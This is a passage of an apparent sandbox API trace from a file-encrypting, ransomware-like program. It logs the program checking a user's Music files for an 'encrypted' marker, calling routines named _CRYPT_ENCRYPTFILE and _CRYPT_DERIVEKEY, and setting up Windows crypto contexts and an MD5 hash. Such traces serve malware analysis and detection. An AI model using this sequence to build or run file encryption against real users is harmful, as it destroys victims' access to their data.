(Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.326] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.326] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.326] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.327] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.327] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.327] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.327] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.327] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c44c280, ftCreationTime.dwHighDateTime=0x1d5bfdf, ftLastAccessTime.dwLowDateTime=0xed260310, ftLastAccessTime.dwHighDateTime=0x1d5bd12, ftLastWriteTime.dwLowDateTime=0xed260310, ftLastWriteTime.dwHighDateTime=0x1d5bd12, nFileSizeHigh=0x0, nFileSizeLow=0x1187d, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="4RuKxK6SJcR.mp3", cAlternateFileName="4RUKXK~1.MP3")) returned 0x7c2100 [0037.328] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.328] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.328] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.328] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.328] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.328] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.328] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.328] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.328] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.328] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.329] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.329] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.329] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.329] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.329] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0037.330] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0037.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.331] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.331] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0037.331] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.332] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.332] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.332] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.332] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.332] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.332] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.332] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.332] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0037.333] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.333] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0037.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0037.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.333] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0037.333] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.333] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0037.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.333] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.334] RtlAllocateHeap 